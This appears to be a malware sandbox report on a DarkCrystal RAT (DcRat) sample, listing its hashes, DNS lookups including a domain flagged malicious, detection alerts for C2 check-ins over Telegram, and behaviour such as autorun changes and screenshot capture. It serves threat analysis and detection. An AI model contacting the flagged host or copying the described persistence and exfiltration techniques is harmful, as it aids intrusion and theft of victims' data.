7068	SIHClient.exe	4.175.87.197:443	slscr.update.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
7068	SIHClient.exe	2.16.253.202:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208	whitelisted
login.live.com	20.190.160.22 20.190.160.3 40.126.32.72 20.190.160.132 20.190.160.65 20.190.160.130 40.126.32.76 20.190.160.64	whitelisted
go.microsoft.com	23.218.210.69	whitelisted
slscr.update.microsoft.com	4.175.87.197	whitelisted
www.microsoft.com	2.16.253.202	whitelisted
fe3cr.delivery.mp.microsoft.com	20.3.187.198	whitelisted
arc.msn.com	20.199.58.43	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
fd.api.iris.microsoft.com	20.199.58.43	whitelisted
635207cm.nyashk.ru	172.67.159.138 104.21.33.71	malicious

Threats

PID	Process	Class	Message
6560	dasHost.exe	Device Retrieving External IP Address Detected	ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
6560	dasHost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
6560	dasHost.exe	A Network Trojan was detected	REMOTE [ANY.RUN] DarkCrystal Rat Check-in (POST)
6560	dasHost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)
2192	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2192	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
6560	dasHost.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
6560	dasHost.exe	Misc activity	ET HUNTING Telegram API Certificate Observed

Add for printing

No debug info

General Info

incore.exe

03D4E131A10BF6C41D45C0918A9E3EA5

E067835A072CEB0D3CC3DD12E8A6D1A43F4D8BB7

5DAAB1D2EE0966832A50B6CC7635707A18D81105D51614C75D106C16FF8012C2

98304:Oyi35HqQ7YRzuyk5uvSJsi8FSUu1A4YK5GBOaicL2EoGgruauozi:1YEMW

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Uses sleep, probably for evasion detection (SCRIPT)

DCRAT mutex has been found

Changes the autorun value in the registry

Connects to the CnC server

DARKCRYSTAL has been detected (SURICATA)

DCRAT has been detected (YARA)

SUSPICIOUS

Starts CMD.EXE for commands execution

Reads security settings of Internet Explorer

Executable content was dropped or overwritten

Executing commands from a ".bat" file

Runs shell command (SCRIPT)

Process drops legitimate windows executable

Executed via WMI

Likely accesses (executes) a file from the Public directory

Reads the date of Windows installation

Starts application with an unusual extension

Probably delay the execution using 'w32tm.exe'

Process communicates with Telegram (possibly using it as an attacker's C2 server)

There is functionality for taking screenshot (YARA)

Checks for external IP

Possible usage of Discord/Telegram API has been detected (YARA)

The process creates files with name similar to system file names

INFO

Reads the computer name

Drops encrypted VBS script (Microsoft Script Encoder)

Checks supported languages

Process checks computer location settings

Reads the machine GUID from the registry

Reads Environment values

The sample compiled with english language support

Create files in a temporary directory

Creates files or folders in the user directory

Changes the display of characters in the console

Disables trace logs

Checks proxy server information

Reads the software policy settings

.NET Reactor protector has been detected

Found Base64 encoded reference to WMI classes (YARA)

Found Base64 encoded access to Windows Defender via PowerShell (YARA)

Failed to create an executable file in Windows directory

Malware configuration

ims-api

DcRat

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information